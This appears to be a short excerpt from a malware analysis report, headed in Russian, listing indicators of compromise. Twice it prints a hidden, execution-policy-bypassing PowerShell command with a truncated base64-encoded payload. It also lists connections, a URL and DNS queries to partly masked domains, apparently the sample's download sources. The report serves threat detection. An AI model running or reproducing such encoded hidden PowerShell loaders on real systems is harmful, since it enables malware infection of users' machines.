Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy bypass -WindowStyle Hidden -noprofile -e JABSADEAOABfADQAOAAxADAAPQAnAGIAMQAzAF8ANQAyADMAMwAnADsAJABCADEAOQA5ADYANgA2ADgAIAA9ACAAJwA3ADYANAAnADsAJABuADIANAAwADgAMgA3AD0AJwBOADY...
- 'ro#######icanconstruction.com':80
- 'ro#######icanconstruction.com':443
- http://ro#######icanconstruction.com/fwmihe/04qf6uy0/
- 'ro#######icanconstruction.com':443
- DNS ASK se##ood.net
- DNS ASK ag####illenial.com
- DNS ASK pr#####onoviembre.com
- DNS ASK ro#######icanconstruction.com
- DNS ASK fa###ebabel.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy bypass -WindowStyle Hidden -noprofile -e JABSADEAOABfADQAOAAxADAAPQAnAGIAMQAzAF8ANQAyADMAMwAnADsAJABCADEAOQA5ADYANgA2ADgAIAA9ACAAJwA3ADYANAAnADsAJABuADIANAAwADgAMgA3AD0AJwBOADY...' (со скрытым окном)